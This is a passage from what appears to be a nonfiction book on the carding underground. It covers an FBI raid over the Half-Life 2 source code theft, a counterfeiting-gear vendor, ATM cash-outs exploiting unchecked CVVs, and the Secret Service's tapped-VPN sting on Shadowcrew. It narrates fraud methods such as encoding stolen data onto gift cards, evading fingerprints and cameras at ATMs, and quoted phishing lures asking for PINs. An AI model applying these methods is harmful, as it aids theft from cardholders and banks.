boxes until Chris’s wife, Clara, could +sell them on eBay. +As night fell over Villa Siena, the lights went on above the +tennis courts and the outdoor fireplaces ignited. Miles away +Chris and his crew were at a restaurant, ordering a +celebratory dinner and a bottle of wine. As always, it was +Chris’s treat. + +14 + +The Raid +ice TV!” said Tim, admiring the sixty-one-inch +Sony plasma hanging on the wall. Charity, a compulsive +reader, hated the new flat-screen, the way it dominated the +living room in their new apartment, but Max loved his +gadgets, and this one was more than a high-def toy. It was +a symbol of the couple’s newfound financial security. +Max’s friends knew that he was into something, and not +just because he was no longer struggling to make ends +meet. Max had begun slipping Tim CD-ROMs burned with +the latest exploits from the underground, giving the system +administrator an edge in protecting his work machines. +Then there were the odd comments at the monthly Hungry +Programmers’ dinner at Jing Jing in Palo Alto. When +everyone was done describing their latest projects, Max +would only offer a cryptic note of envy. “Wow, I wish I was +doing something positive.” +But nobody was pressing Max for the details of his new +gig; they could only hope it was something quasilegitimate. +The hacker scrupulously avoided burdening his friends with +the knowledge of his double life, even as he slipped farther +to the edge of their circle. Until the day one of his hacks +followed him home. +• • • +It was 6:30 a.m. and still dark out when Chris Toshok +awoke to the sound of his doorbell buzzing, the long +continuous drone of someone holding their thumb on the +button. Figuring it for a neighborhood drunk, he rolled over + +and tried to get back to sleep. Then the buzz broke into an +insistent rhythm, bzzz, bzzz, bzzz, like a busy signal. He +reluctantly crawled out of bed, grabbed his pants and a +sweatshirt, and moved groggily down the stairs. +When he opened the door he found himself squinting into +the glare of a flashlight. +“Are you Chris Toshok?” said a woman’s voice. +“Uh, yes.” +“Mr. Toshok, we’re with the FBI. We have a warrant to +search the premises.” +The agent—a long-haired blonde—showed Toshok her +badge and pressed a thin sheaf of papers into his hands. +Another agent put a firm hand on his arm and guided him +outside to the porch, clearing the doorway to admit a flood +of suits into the house. They roused Toshok’s roommate, +then began tossing Chris’s bedroom, riffling through his +bookshelves and pawing through his underwear drawer. +The blonde, joined by a Secret Service agent, sat down +with Toshok to explain why they were there. Four months +earlier the source code for the unreleased first-person +shooter Half-Life 2 had been stolen from the computers of +Valve Software in Bellevue, Washington. It was swapped in +IRC for a while and then showed up on file-sharing +networks. +Half-Life 2 was perhaps the most anticipated game of all +time, and the emergence of the secret source code had +electrified the gaming world. Valve announced it would +have to delay the launch of the game, and the company +CEO issued a public call for Half-Life fans to help track +down the thief. Based on sales of the original game, Valve +valued the software at a quarter of a billion dollars. +The FBI had traced some of the hacking activity to +Toshok’s Internet IP address at his old house, the agent +explained. The judge would go easier on Toshok if he told +them where he’d stashed the source code. +Toshok protested his innocence, though he + +acknowledged that he knew about the breach. His old +friend Max Vision was staying with him at the time of the +intrusion, and he got very excited when the source code +popped up online. +Hearing Max Vision’s name sent the agents into double +time—they nearly tripped over themselves to finish the +search and get back to the office to prepare a warrant +application for Max’s new apartment. Chris watched +gloomily as they gathered his nine computers, some music +CDs, and his Xbox. The blonde agent registered the look +on his face. “Yeah,” she said, “this is going to be hard for +you.” +When Max heard about the raid, he knew he didn’t have +much time. He ran around his apartment stashing his gear. +He hid an external hard drive in a stack of sweaters in the +closet, another in a cereal box. One of his laptops fit under +the sofa cushions; he hung a second one out the bathroom +window in a garbage bag. Everything sensitive on his +computers was encrypted, so even if they found his +hardware, the agents wouldn’t get any evidence of his +hacking. But under the terms of his supervised release, he +wasn’t supposed to be using encryption at all. Moreover, it +would be incredibly inconvenient to let the FBI take all of his +computers. +The feds arrived in force, as many as twenty agents +swarming like ants through the apartment. They found only +the routine trappings of a San Francisco computer geek +with hippie leanings: a bookshelf with Orwell’s 1984, +Huxley’s Brave New World, Orson Scott Card’s sci-fi +classic Ender’s Game, and a smattering of Asimov and +Carl Sagan. There was a bicycle, and stuffed penguins +were strewn everywhere. Max loved penguins. +They discovered not one of Max’s slapdash hiding spots, +and this time, the hacker had nothing to say. The agents left +without any evidence linking Max to the Valve intrusion, +much less any hints of the crimes he was committing with + +Chris. Just a stack of CDs, a broken hard drive, and a +vanilla Windows machine he’d left out as diversions. +But Charity had just learned what it meant to be in Max +Vision’s world. Max insisted he was innocent of the source +code theft. It was probably the truth. There’d been several +first-person shooter fans crawling around Valve’s Swiss +cheese network in anticipation of Half-Life 2. Max +happened to be one of them. +The FBI later settled on a different Valve hacker: a +twenty-year-old German hacker named Axel “Ago” Gembe, +who admitted to his intrusions in e-mails to Valve’s CEO, +though he too denied stealing the code. +Gembe was already notorious for creating Agobot, a +pioneering computer worm that did more than just spread +from one Windows machine to another. When Agobot took +over a machine, the user might not notice anything but a +sudden sluggishness in performance. But deep in the PC’s +subconscious, it was joining a hacker’s private army. The +malware was programmed to automatically log in to a +preselected IRC room, announce itself, and then linger to +accept commands broadcast by its master in the chat +channel. +Thousands of computers would report at once, forming a +kind of hive mind called a botnet. With one line of text, a +hacker could activate keystroke loggers on all the +machines to capture passwords and credit card numbers. +He could instruct the computers to open secret e-mail +proxies to launder spam. Worst of all, he could direct all +those PCs to simultaneously flood a targeted website with +traffic—a distributed denial-of-service attack that could +take down a top site for hours while network administrators +blocked each IP address one at a time. +DDoS attacks started as a way for quarreling hackers to +knock each other out of IRC. Then one day in February +2000, a fifteen-year-old Canadian named Michael +“MafiaBoy” Calce experimentally programmed his botnet to +hose down the highest-traffic websites he could find. CNN, + +hose down the highest-traffic websites he could find. CNN, +Yahoo!, Amazon, eBay, Dell, and E-Trade all buckled under +the deluge, leading to national headlines and an +emergency meeting of security experts at the White House. +Since then, DDoS attacks had grown to become one of the +Internet’s most monstrous problems. +Bots like Ago’s marked the decade’s major innovation in +malware, inaugurating an era where any pissed-off script +kiddie can take down part of the Web at will. Gembe’s +confession in the Valve hack provided the FBI with a +golden opportunity to snare one of the innovators most +responsible. The FBI tried to lure Gembe to America with +an Invita-style job offer from Valve. After months of +negotiations and telephone interviews with Valve +executives, the hacker seemed ready to hop a flight to the +States. +Then the German police intervened, arrested the hacker, +and charged him locally as a youthful offender. Gembe was +sentenced to one year of probation. +The raid on Max’s house shook him, filling his head with +unpleasant memories of the FBI’s search warrant over the +BIND attacks. Max decided he needed a safe house in the +city, a place where he could ply his trade and store his data +free from the threat of search warrants—something like +Chris’s Villa Siena plant. +Under an alias, Chris rented a second apartment for +Max, a spacious penthouse in the Fillmore District, with a +balcony and a fireplace—Max liked working by an open +fire, and he’d joked that he could burn the evidence in an +emergency. +Max tried to get home to Charity daily, but with a +comfortable hacker safe house to retreat to, he began +disappearing for days at a stretch, sometimes only +emerging when his girlfriend interrupted his work with a +prodding phone call. +“Dude, time to come home. I miss you.” + +As money started to flow into Max and Chris’s joint +operation, so did the mistrust. Some of the cashers in +Chris’s crew liked to party, and the constant presence of +cocaine, ecstasy, and pot called to Chris like a forgotten +melody. In February, he was pulled over near his home and +arrested for driving under the influence. He began routinely +vanishing with his comely employees for weekend-long +bacchanals in Vegas: The day was for shopping; at night, +Chris would snort some coke and take the girls out to the +Hard Rock to party or snag a VIP table at the sleek +Ghostbar atop the Palms, where he’d blow $1,000 on +dinner and another grand on wine. Back in Orange County, +he took a mistress—an eighteen-year-old woman he met +through one of his cashers. +Max found both drugs and marital infidelity distasteful. +But what really irked him was the financial arrangement. +Chris was paying Max haphazardly—in whatever amount +he felt like turning over at any given moment. Max wanted a +straight 50 percent of Chris’s profits. He was certain that +Chris was making serious bank from their joint operation. +Chris tried to set him straight, and he e-mailed Max a +detailed spreadsheet showing where the profits were +going. Out of a hundred cards, maybe fifty worked, and only +half of those could buy anything worth selling—the others +were seeds and stems, cards with $500 security limits that +were good only for trifles like gas and meals. Chris had +expenses, too—spreading his hustle meant flying his crew +to far-flung cities, and airline seats weren’t getting any +cheaper. Meanwhile, he was paying rent at Villa Siena for +his credit card factory. +Max was unconvinced. “Call me back when you’re not +stoned.” +The last straw came when Chris, three months after the +Half-Life raid, suffered a close call himself. He’d driven up +to San Francisco to meet with Max and make some +carding runs at Peninsula malls. He and his crew were +checked into adjacent rooms at the W, a posh hotel in the + +checked into adjacent rooms at the W, a posh hotel in the +Soma district, when Chris got a call from the front desk. His +credit card had been declined. +Hungover and fuzzy-headed from the flu, Chris took the +elevator to the marbled lobby and pulled a new fake card +from his swollen wallet. He watched as the clerk swiped it. It +was declined. He produced another one, and it failed too. +The third one worked, but by then the clerk was suspicious, +and as the elevator was carrying Chris back to the twenty- +seventh floor, she was picking up the phone and calling the +credit card company. +The next knock on Chris’s door was the San Francisco +Police Department. They cuffed him and searched his +rooms and car, seizing his Sony laptop, an MSR206, and +his SUV, which had a fake VIN tag—Chris had +experimented with renting cars using his plastic in Las +Vegas, then sending them to Mexico to be fitted with clean +VINs. +Chris was thrown in the county jail. His disappearance +worried Max, but Chris bailed out quickly and confessed his +blunder to his partner. Fortunately for him the police +investigation went no further. Chris was sentenced a month +later to three years of probation and ordered not to return to +the W. He boasted afterward that he’d been a beneficiary +of San Francisco’s liberal justice system. +It was the kind of bullshit local bust that happened to +Chris’s girls all the time; that was why Chris kept a bail +bondsman on retainer and even let him crash at his Villa +Siena factory. But Max was furious. It was unforgivably +sloppy for someone at Chris’s level to be arrested carding +a hotel room. +Max decided he could no longer rely exclusively on his +partner. He needed a Plan B. + +15 + +UBuyWeRush +he run-down strip mall was plunked down in that vast, +flat interior of Los Angeles County that doesn’t make it onto +postcards, far from the ocean and so distant from the hills +that the squat stucco buildings could be a Hollywood set, +the featureless sky behind them a blue screen to be filled in +with mountains or trees in post-production. +Chris pulled his car into the trash-strewn parking lot. A +marquee at the entrance gave top billing to the Cowboy +Country Saloon, and below that it was the usual south Los +Angeles mix: a liquor store, a pawnshop, a nail salon. And +one more that was less usual: UBuyWeRush—the only +retail sign in Los Angeles that was also a handle on +CarderPlanet and Shadowcrew. +He walked into the front office, where an empty reception +window suggested the sixty-cent-per-square-foot space +had once been a medical clinic. On the wall a Mercator +projection map of the world bristled with pushpins. Then +Chris was greeted warmly by UBuy himself, Cesar +Carrenza. +Cesar had come to the underground by a circuitous +course. He graduated from the DeVry Institute in 2001 with +a degree in computer programming, hoping to get an +Internet job. When he couldn’t find one, he decided to try his +hand as an independent businessman on the Web. +From an ad in the Daily Commerce, he learned about an +upcoming auction at a public storage facility in Long +Beach, where the owners were selling off the contents of +abandoned lockers. When he showed up he found the +auction observed a very specific ritual. The manager, + +wielding an imposing bolt cutter, would snip off the +defaulting renter’s lock while the bidders watched, and then +open the door. The bidders, about twenty of them, were +expected to evaluate the contents from where they stood +several feet away. The winner would then secure the unit +with his own padlock and clear out the contents within +twenty-four hours. +The experienced bidders were easy to spot: Padlocks +hung from their belts, and they held flashlights to peer into +the dark lockers. Cesar was less prepared but no less +eager. He was the only bidder on the first lot, claiming a +locker full of old clothes for $1. +He sold the clothes at a yard sale and on eBay for about +$60. Figuring he’d found a nice little niche, Cesar started +going to more auctions at storage facilities and business +liquidations, breaking down large lots and moving them on +eBay for a tidy profit. He put the money back into the +business and opened his storefront in the Long Beach strip +mall to accept consignments from neighbors with office +furniture, lawn chairs, and unbranded jeans to sell online. +It was good, honest work—not like his last independent +business. For most of the 1990s Cesar had been into +credit card fraud. He was happier selling on eBay, but +thinking about the past made him wonder if there was a +market for the kind of gear he’d used as a crook. He +ordered some MSR206s from the manufacturer and +offered them for sale through the UBuyWeRush eBay store. +He was impressed by how fast they were snapped up. +Then one of his new customers told him about a website +where he could really sell. He introduced Cesar to Script, +who approved UBuyWeRush as a CarderPlanet vendor. +Cesar posted his introduction on August 8, 2003. “I +decided to supply all you guys making the real big bucks,” +he wrote. “So if you need me I sell card printers, card +embossers, tippers, encoders, small readers and more. I +know it sounds like advertising, but it’s for you, a SAFE +place to shop.” + +place to shop.” +Business exploded overnight. Cesar built his own +website, began vending on Shadowcrew, got an 800 +number, and started accepting e-gold, an anonymous +online currency favored by carders. He developed a +reputation for excellent customer service. With customers in +every time zone, he was scrupulous about answering the +phone whenever it rang, day or night. It was always money +on the other end of the line. +A canny businessman, he guaranteed same-day +shipping and forged relationships with his rivals, so if he +was caught short on an item, he could buy stock from a +competitor to fill his orders and keep his customers happy. +Strategic moves like that soon turned UBuyWeRush into +the top supplier of hardware to a worldwide community of +hackers and identity thieves. “Really good person, great to +deal with,” wrote a carder named Fear, advising a +Shadowcrew newbie. “Don’t scam UBuyWeRush cause +he’s a cool guy, and he’ll keep your info on the downlow.” +Cesar soon expanded his offerings to include hundreds +of different products: skimmers, passport cameras, foil +stampers, blank plastic, barcode printers, embossers, +check paper, magnetic ink cartridges, even cable TV +descramblers. Selling equipment wasn’t in and of itself +illegal, as long as he wasn’t conspiring in its criminal +applications. He even had some law-abiding customers +who bought his gear to make corporate ID cards and +school lunch vouchers. +Inundated with orders, Cesar ran a help-wanted ad in the +classifieds and began hiring workers to inventory, pack, +and ship his gear. As adjoining offices opened up, he +annexed them for the extra storage space, doubling and +then tripling his square footage. Fascinated by the global +reach of his low-rent strip-mall operation, he bought a wall +map, and every time he shipped to a new city he’d sink a +pin into the location. After six months, the map was +porcupined with pins throughout the United States, + +Canada, Europe, Africa, and Asia. An impenetrable forest +of metal grew southwest of Russia on the Black Sea. +Ukraine. +Chris had become friends with Cesar. He’d even had +him over for dinner, along with Mrs. UBuyWeRush, Clara, +and Chris’s two boys—well-mannered kids who stayed at +the dinner table all the way through dessert. Chris +particularly liked hanging out at Cesar’s office. You never +knew who would show up at UBuyWeRush. Carders too +paranoid to have counterfeiting gear shipped even to a +drop would make a pilgrimage to Los Angeles to pick up +their items in person, opening the front door through their +shirtsleeve to leave no prints and paying in cash. Foreign +carders vacationing in California would stop by just to see +the legendary warehouse with their own eyes and shake +Cesar’s hand. +On this day, the man walking in to pick up an MSR206 +was the last person Chris expected to see in Cesar’s shop, +a six-foot-five hacker with a long ponytail. +Chris was stunned; Max rarely left San Francisco these +days, and he hadn’t said anything about coming to town. +Max was equally surprised to see Chris. They exchanged +pleasantries awkwardly. +There was only one reason Max would sneak into Los +Angeles to buy his own magstripe encoder, Chris knew. +Max had decided to stop sharing his most valuable data. +Max had become privy to one of the biggest security +blunders in banking history, one that most consumers would +never hear about, even as it enriched carders to the tune of +millions of dollars. +The midsized Commerce Bank in Kansas City, Missouri, +may have been the first to figure out what was going on. In +2003, the bank’s security manager was alarmed to find that +customer accounts were being sacked for $10,000 to +$20,000 a day from cash machines in Italy—he would + +come in on a Monday and find his bank had lost $70,000 +over the weekend. When he investigated, he learned that +the victim customers had all fallen for a phishing attack +aimed specifically at their debit card numbers and PINs. +But something didn’t make sense: CVVs were supposed +to prevent exactly this kind of scam. Without the CVV +security code programmed onto the magnetic stripe of the +real cards, the phished information shouldn’t have worked +at any ATM in the world. +He dug some more and discovered the truth: His bank +simply wasn’t checking the CVV codes on ATM +withdrawals, nor on debit card purchases, where the +consumer enters the PIN at the register. In fact, the bank +couldn’t perform such a check consistently if it wanted to; +the third-party processing network used by the bank didn’t +even forward the secret code. The Italian phishers could +program any random garbage into the CVV field, and the +card would be accepted as the real thing. +The manager moved the bank to another processing +network and reprogrammed his servers to verify the CVV. +The mysterious withdrawals from Italy halted overnight. +But Commerce Bank was just the beginning. In 2004, +nearly half America’s banks, S&Ls, and credit unions still +weren’t bothering to verify the CVV on ATM and debit +transactions, which is why America’s in-boxes were being +flooded with phishing e-mails targeting PIN codes for what +the carders called “cashable” banks. +Citibank, the nation’s largest consumer bank by holdings, +was the most high-profile victim. “This e-mail was sent by +the Citibank server to verify your e-mail address,” read a +message spammed from Russia in a September 2003 +campaign. “You must complete this process by clicking on +the link below and entering in the small window your +Citibank ATM/Debit Card number and PIN that you use on +ATM.” +A more artful message in 2004 capitalized on +consumers’ well-founded fears of cybercrime. “Recently + +consumers’ well-founded fears of cybercrime. “Recently +there have been a large number of identity theft attempts +targeting Citibank customers,” read the spam, emblazoned +with Citi’s iconography. “In order to safeguard your account, +we require that you update your Citibank ATM/Debit card +PIN.” Clicking on the link took customers to a perfect +simulacrum of a Citibank site, hosted in China, where the +victim would be prompted for the data. +Good for direct cash, PINs were the holy grail of carding. +And it was CarderPlanet’s King Arthur who was most +successful in the quest. King, as he was known to his +friends, ran an international ring that specialized in hitting +Citibank customers, and he was a legend in the carding +world. One of King Arthur’s lieutenants, an American expat +in England, once let it slip to a colleague that King was +making $1 million a week from the global operation. And he +was just one of many Eastern Europeans running cash-outs +in America. +Max plugged himself into the Citibank cash-outs in his +own way: He Trojaned an American mule named Tux, and +started intercepting the PINs and account numbers the +carder was getting from his supplier. After a while, he +contacted the source—an anonymous Eastern European +whom Max suspected of being King Arthur himself—and +told him candidly what he’d done: Tux, he said, had been +guilty of the crime of slipshod security. For good measure, +Max claimed falsely that the mule had been ripping off the +supplier. +The supplier cut off Tux on the spot and began providing +Max with his PINs directly, anointing the hacker as his +newest cash-out mule. +When the PINs first started rolling in, Max had passed +them all to Chris, who tore into them with a vengeance. +Chris would pull $2,000 in cash—the daily ATM withdrawal +limit—and then send his girls out to make in-store debit +purchases with the PINs until the account was drained dry. +He was raping the cards. Max didn’t like it. The whole point + +of a cash-out was to get cash, not merchandise that sold +for a fraction of its worth. With a little finesse, the PINs could +be producing a lot more liquid. +Then it occurred to him he didn’t need his partner at all +for this particular operation. +When he returned from UBuyWeRush with his very own +MSR206, Max went into business for himself. He +programmed a stack of Visa gift cards with the account +data and wrote each card’s PIN on a sticky note affixed to +the plastic. Then he’d get on his bicycle or take a long +meandering walk through the city, visiting small, customer- +owned cash machines at locations free of surveillance +cameras. +He’d enter the PIN, then the withdrawal amount, and +chump, chump, chump, chump, the ATM spat out cash +like a slot machine. Max would pocket the money, write the +new, lower account balance on the Post-it, then look around +discreetly to make sure he hadn’t drawn any attention +before drawing the next card from his deck. To keep his +prints off the machines, he’d press the buttons through a +piece of paper or with his fingernails, or coat the pads of +his fingers with hydroxyquinoline—a clear, tacky antiseptic +sold in drugstores as the liquid bandage New-Skin. +Max dutifully sent a fixed percentage of his take to +Russia via Western Union MoneyGram, per his agreement +with the supplier. He was an honest criminal now, doing +straightforward business in the underground. And even +after getting his own magstripe writer, Max continued to +give some of his PINs to Chris, who continued tapping his +crew to burn through the cards aggressively. +On the surface, Max’s ATM visits weren’t much of a +Robin Hood operation, but Max took moral solace in the +fact that the cash-outs always ended with the cards being +canceled. That meant the fraudulent withdrawals were +being discovered, and Citibank would be forced to +reimburse its customers for the thefts. + +After some months, Max built a nice nest egg from +Citibank’s losses: He moved with Charity to a $6,000-a- +month house rental in San Francisco’s Cole Valley and +installed a safe for his profits: $250,000 in cash. +His earnings were just a tiny piece of the losses from the +CVV gaffe. In May 2005, a Gartner analyst organized a +survey of five thousand online consumers and, extrapolating +the results, estimated that it had cost U.S. financial +institutions $2.75 billion. In just one year. + +16 + +Operation Firewall +here was something fishy going on with Shadowcrew. +Max kept his presence on the Internet’s top crime site +low-key; to him, Shadowcrew was just a hunting ground +conveniently stocked with hackable carders. But in May +2004, a Shadowcrew administrator made an offer on the +board that got Max’s attention. The admin, Cumbajohnny, +was announcing a new VPN service just for Shadowcrew +members. +A VPN—virtual private network—is typically used to +provide telecommuters with access to their employer’s +network from home. But a trustworthy underground VPN +appealed to carders for another reason. It meant every byte +of traffic from their computers could be encrypted—immune +to sniffing by a nosy ISP or a law enforcement agency with +a surveillance warrant. And any attempt to trace their +activities would get no farther than Cumbajohnny’s own +data center. +Cumbajohnny was a recent addition to Shadowcrew’s +leadership—a former moderator who was growing in +power and influence and changing the mood on the board. +Some other admins were complaining about a new mean- +spiritedness on the forum. Banner ads appeared at the top +of the site: “Stop talking. Do Business. Advertise here. +Contact Cumbajohnny.” Shadowcrew was taking on the feel +of the Las Vegas strip, with flashy ads promising a lifestyle +of partying, beautiful women, and piles and piles of cash. +Gollumfun, an influential founder, had already publicly +retired from the site when another founder named +BlackOps announced he was leaving as well. “Shadowcrew + +has been reduced from its once lustrous form to a +degrading environment of children who lack knowledge, the +skills or desire to interact with other members in a positive +way,” he wrote. “Gone are the well thought out tutorials; +gone are the well-respected members; and gone is the +civility. No longer do we help the newbies find their way, we +simply flame them to death until they leave and then +complain that there aren’t any new members.” +“BlackOps, you will be missed, thank you for your +services,” Cumbajohnny wrote tactfully. “SC is changing, +and for the best.” +Max paid little attention to the politics of the carding +scene. But the VPN announcement made him uneasy. It +turned out Cumbajohnny had been privately selling his VPN +service to Shadowcrew’s leaders for three months. Now, +Cumbajohnny wrote, any Shadowcrew member in good +standing could buy the same peace of mind for $30 to $50 +a month. +But VPNs have one well-known weakness: everything +transpiring over the network has to be funneled through a +central point, unencrypted and vulnerable to +eavesdropping. “If the FBI, or whoever, really wanted to they +could get into the datacenter and change some of the +configs on the VPN box and start logging, and then you +would be kinda screwed,” one member noted. “But that is +just straight paranoia,” he conceded. +Cumbajohnny reassured him. “No one can touch the VPN +without me knowing about it.” +Max wasn’t convinced. In his white-hat days, he’d written +a program for the Honeynet Project called Privmsg—a +PERL script that took the data from a packet sniffer and +used it to reconstruct IRC chats. When an intruder was +lured into cracking one of the project’s honeypots, the +attacker would often use the system to hold online +conversations with his fellow hackers. With Privmsg, the +white hats could see the whole thing. It had been a strong +innovation in hacker tracking, turning passive honeypots + +innovation in hacker tracking, turning passive honeypots +into digital wiretaps and opening a window into the +underground’s culture and motives. +Max could see the same wiretap tactic at play now in +Cumbajohnny’s VPN offer. There was other evidence, too; +while hacking random carders, he saw a message to a +Shadowcrew administrative account that read like a federal +agent giving orders to an informant. Max couldn’t shake the +feeling that someone was turning Shadowcrew into the +ultimate honeypot. +After talking it over with Chris, Max posted several +messages to Shadowcrew summarizing his doubts. The +posts disappeared at once. +Max’s suspicions were right on the money. +The NYPD had nabbed Albert “Cumbajohnny” Gonzalez +nine months earlier pulling cash out of a Chase ATM on +New York’s Upper West Side. Originally from Miami, +Gonzalez was twenty-one years old and the son of two +Cuban immigrants. He was also a longtime hacker who’d +been dedicated enough to trek to Vegas for the 2001 Def +Con. +The Secret Service interviewed Gonzalez in custody and +quickly ascertained his worth. The hacker was living in a +$700-a-month garden apartment in Kearny, New Jersey, +had $12,000 in credit card debt, and was officially +unemployed. But as “Cumbajohnny,” he was a trusted +confidant and colleague of carders around the world and, +most importantly, a moderator at Shadowcrew. +He was in the belly of the beast, and properly handled, he +might strike a deathblow against the forum. +The Secret Service took over the case and sprang +Gonzalez to use him as an informant. The VPN was the +agency’s masterstroke. The equipment was bought and +paid for by the feds, and they’d obtained wiretap warrants +for all the users. Cumbajohnny’s carder-only VPN service +was an invitation to an Internet panopticon. + +Shadowcrew’s biggest players were drawn inexorably +into the Secret Service’s surveillance net. The tapped VPN +laid bare all the wheeling and dealing the carders kept off +the public website—the hard negotiating that unfolded +mostly in e-mail and over IM. +There were deals every day and every night, with a +weekly surge in trading Sunday evenings. The transactions +ranged from the petty to the gargantuan. On May 19, agents +watched Scarface transfer 115,695 credit card numbers to +another member; in July, APK moved a counterfeit UK +passport; in August, Mintfloss sold a fake New York driver’s +license, an Empire Blue Cross health insurance card, and a +City University of New York student ID card to a member in +need of a full identification portfolio. A few days later, +another sale by Scarface, just two cards this time; then +MALpadre bought nine. In September, Deck sold off +eighteen million hacked e-mail accounts with user names, +passwords, and dates of birth. +The Secret Service had fifteen full-time agents combing +through the activity—every purchase would be another +“underlying offense” in a grand jury indictment. And the best +part was, many of Shadowcrew’s denizens were unwittingly +paying the Secret Service for the privilege of being +monitored. +But running a game against hackers was never cut-and- +dried, as the agency learned on July 28, 2004. That was +when Gonzalez informed his handlers that a carder named +Myth, one of King Arthur’s cashers, had somehow obtained +one of the agency’s confidential documents about +Operation Firewall. Myth had been boasting about it in an +IRC chat room. +The feds told Gonzalez to find the source of the leak, and +fast. As Cumbajohnny, Gonzalez made contact with Myth +and learned that the documents represented just a few +droplets in a full-blown Secret Service data spill. Myth knew +about subpoenas issued in the Shadowcrew probe and +had even discovered that the agency was monitoring his + +had even discovered that the agency was monitoring his +own ICQ account. Fortunately, the documents didn’t +mention an informant. +Myth refused to tell Gonzalez who his source was but +agreed to arrange an introduction. The next day, Gonzalez, +Myth, and a mystery hacker using the temporary handle +“Anonyman” met on IRC. Gonzalez worked to gain +Anonyman’s trust, and the hacker finally revealed himself as +Ethics, a vendor whom Cumba already knew on +Shadowcrew. +The leak was starting to make sense. In March, the +Secret Service had noticed Ethics was selling access to +the database of a major wireless carrier, T-Mobile. “I am +offering reverse lookup of information for a T-Mobile cell +phone, by phone number,” he wrote in a post. “At the very +least, you get name, SSN, and DOB. At the upper end of +the information returned, you get Web username/password, +voicemail password, secret question/answer.” +T-Mobile had failed to patch a critical security hole in a +commercial server application it had purchased from the +San Jose, California, company BEA Systems. The hole, +discovered by outside researchers, was painfully simple to +exploit: An undocumented function allowed anyone to +remotely read or replace any file on a system by feeding it +a specially crafted Web request. BEA produced a patch for +the bug in March 2003 and issued a public advisory rating +it a high-severity vulnerability. In July of that year, the +researchers who discovered the hole gave it more attention +by presenting it at the Black Hat Briefings convention in Las +Vegas, an annual pre–Def Con gathering attended by +1,700 security professionals and corporate executives. +Ethics learned of the BEA hole from the advisory, crafted +his own twenty-line exploit in Visual Basic, then began +scanning the Internet for potential targets who had failed to +patch. By October 2003, he hit pay dirt at T-Mobile. He +wrote his own front end to the customer database to which +he could return at his convenience. + +At first, he used his access to raid the files of Hollywood +stars, circulating grainy candid photos of Paris Hilton, Demi +Moore, Ashton Kutcher, and Nicole Richie stolen from their +Sidekick PDAs. It was evident now that he’d gotten into a +Secret Service agent’s Sidekick as well. +A simple Google search on Ethics’s ICQ number turned +up his real name on a 2001 résumé seeking computer +security work. He was Nicholas Jacobsen, a twenty-one- +year-old Oregonian who’d recently relocated to Irvine, +California, to take a job as a network administrator. All that +was left was to confirm which Secret Service agent was +violating policy by accessing sensitive material on his PDA. +That’s where Gonzalez proved his worth again. Now that +he was buddies with Cumbajohnny, Ethics hit up the +Shadowcrew leader for an account on his much-touted +VPN, figuring it would be a safer way to access T-Mobile. +Gonzalez happily obliged, and his Secret Service +handlers got to watch as Ethics surfed to T-Mobile’s +customer service website and logged in with the user name +and password of New York agent Peter Cavicchia III, a +veteran cybercrime officer who’d distinguished himself by +busting a former AOL employee for stealing ninety-two +million customer e-mail addresses to sell to spammers. +The leak had been found. Cavicchia would quietly retire a +few months later, and Ethics was added to the list of +Operation Firewall targets. +There was just one more threat to the investigation, and, +bizarrely, it was coming from one of the FBI’s underground +assets. +David Thomas was a lifelong scammer who’d +discovered the crime forums in the Counterfeit Library days +and soon became addicted to the high-speed deal making +and criminal camaraderie. Now forty-four years old, El +Mariachi, as he styled himself, was one of the most +respected members in the carding community, assuming + +the role of mentor to younger scammers and dispensing +advice on everything from identity theft to basic life lessons +gleaned from decades on the fringe. +His experience, though, didn’t immunize him from the +hazards of his profession. In October 2002, Thomas +showed up in an office park in Issaquah, Washington, +where he and his partner had rented a drop for one of +CarderPlanet’s founders. They were hoping to claim +$30,000 in Outpost.com merchandise ordered by the +Ukrainian. Instead, they found local police waiting for them. +The police arrested Thomas, and a detective read him +his Miranda rights and gave him a form to sign +acknowledging he understood them. Thomas scoffed at the +idea of a local cop trying to question him. “You don’t know +who you have here,” he said. He urged the detective to call +in the feds; the Secret Service would know who El Mariachi +was, and he could give them a case involving Russians and +“millions of dollars.” +A Secret Service agent visited him in the county jail but +wasn’t impressed by Thomas’s $30,000-drop business. +Then an FBI agent from the Seattle field office showed up. +On the second meeting, the agent brought along an +assistant U.S. attorney and an offer: The feds couldn’t help +Thomas with his local case, but when he got out he could +go to work for the Northwest Cyber Crime Task Force in +Seattle. +It would be an intelligence-gathering mission, an official +designation for an FBI operation with no predetermined +targets. The bureau would get Thomas a new computer, put +him up in a nice apartment, pay all of his expenses, and +give him $1,000 a month in spending money. In return, +Thomas would gather information on the underground and +report it back to the task force. +Thomas hated snitches, but he liked the idea of being +paid to observe and comment on the underground with +which he’d become obsessed. Intelligence gathering +wasn’t the same as snitching, he reasoned, and he could + +wasn’t the same as snitching, he reasoned, and he could +use the material he collected to write a book about the +carding scene, something he’d been thinking a lot about +lately. +He also knew exactly how to gather the information the +task force was after. +Thomas was released from jail five months after his +arrest. And in April, the FBI gained a new asset in the war +on cybercrime: El Mariachi and his brand-new government- +funded crime forum, the Grifters. +From his bureau-rented corporate apartment in Seattle, +El Mariachi was soon gathering information on his fellow +carders, particularly the Eastern Europeans. But though +Thomas was working for the FBI, he didn’t exactly feel +kinship with other government assets, and the VPN +announcement convinced him—correctly—that +Cumbajohnny was a federal informant. +Thomas became fixated on exposing his rival. Ignoring +admonishments from his FBI handler, he continuously +called out Gonzalez on the forums. Gonzalez, too, seemed +to have it in for El Mariachi—he dug up a copy of the police +report from Thomas’s Seattle arrest and circulated it +among the Eastern European carders, drawing their +attention to the part where Thomas offered to help catch +Russians. A full-blown proxy war had broken out between +the FBI and Secret Service, by way of two informants. +It was a bad time to be distracting the Eastern +Europeans with American carder drama. In May 2004, one +of CarderPlanet’s Ukrainian founders was extradited to the +United States, after being arrested on vacation in Thailand. +The next month, the British national police moved in on the +site’s only native English-speaking administrator in Leeds. +Script, getting heat from the Orange County FBI and the +U.S. Postal Inspection Service, had already retired from the +site, leaving King Arthur in charge. On July 28, 2004, King +made an announcement. +“It is time to tell you the bad news—the forum should be + +closed,” he wrote. “Yes, it really means closed and there +are a lot of reasons for that.” +In broken English he explained that CarderPlanet had +become a magnet for law enforcement agencies around +the world. When carders were busted, police interrogators +badgered them with questions about the forum and its +leaders. Under the relentless pressure, he implied, even he +might slip up. “All of us are just people and all of us can +make mistakes.” +By closing CarderPlanet, he would be depriving his +enemies of their greatest asset. “Our forum held them well +informed and up to date, and on our forum they and the +bank employees just have been raising their level of +proficiency and knowledge,” he wrote. +“Now all of thing will be the same but they will not know +where the wind blows from and what to do.” +With that farewell note, King Arthur, almost certainly a +millionaire ten times over, became a carder legend. He +would be remembered as the one who gently folded the +great 